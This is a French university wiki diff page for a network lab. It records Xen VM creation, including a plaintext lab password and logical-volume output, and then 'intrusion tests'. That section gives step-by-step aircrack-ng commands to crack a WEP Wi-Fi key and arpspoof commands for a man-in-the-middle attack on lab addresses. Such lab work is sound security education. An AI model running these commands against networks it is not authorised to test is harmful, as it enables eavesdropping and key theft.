TP sysres IMA5sc 2020/2021 G9 : Différence entre versions
De Wiki d'activités IMA
(→Cassage de clef WEP d'un point d'accés Wifi) |
(→Cassage de clef WEP d'un point d'accés Wifi) |
||
Ligne 50 : | Ligne 50 : | ||
Cette commande permet d'afficher les interfaces réseau | Cette commande permet d'afficher les interfaces réseau | ||
− | airmon-ng start <interface> | + | airmon-ng start <interface> |
+ | Pour passer l'interface en mode monitor | ||
− | airodump-ng --encrypt wep 'nomInterface' | + | airodump-ng --encrypt wep 'nomInterface' |
+ | Pour afficher les réseaux wifi WEP | ||
− | airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface' | + | airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface' |
+ | Pour capturer les paquets émis par le point d'accés ciblé | ||
− | aircrack-ng -x 'nomFichier'-01.cap | + | aircrack-ng -x 'nomFichier'-01.cap |
+ | Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets) | ||
___________________________ | ___________________________ |
Version du 30 novembre 2020 à 16:34
Création de la VM
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5
--- Logical volume --- LV Path /dev/storage/PaulTanguy1 LV Name PaulTanguy1 VG Name storage LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD LV Write Access read/write LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100 LV Status available # open 0 LV Size 10.00 GiB Current LE 2560 Segments 1 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 254:24 --- Logical volume --- LV Path /dev/storage/PaulTanguy2 LV Name PaulTanguy2 VG Name storage LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt LV Write Access read/write LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100 LV Status available # open 0 LV Size 10.00 GiB Current LE 2560 Segments 1 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 254:25
Tests d'intrusion
Cassage de clef WEP d'un point d'accés Wifi
En premier lieu, on installe le paquetage aircrack-ng sur un PC.
Ensuite, on utilise les commandes suivantes :
airmon-ng
Cette commande permet d'afficher les interfaces réseau
airmon-ng start <interface>
Pour passer l'interface en mode monitor
airodump-ng --encrypt wep 'nomInterface'
Pour afficher les réseaux wifi WEP
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'
Pour capturer les paquets émis par le point d'accés ciblé
aircrack-ng -x 'nomFichier'-01.cap
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)
___________________________
Man In The Middle (Homme du milieu en anglais)
Sur un eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :
echo 1 > /proc/sys/net/ipv4/ip_forward
ensuite on utilise la commande du paquet dsniff :
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58 arpspoof -i eth0 -t 172.26.145.58 172.26.145.254
ensuite on utilise wireshark pour observer les paquets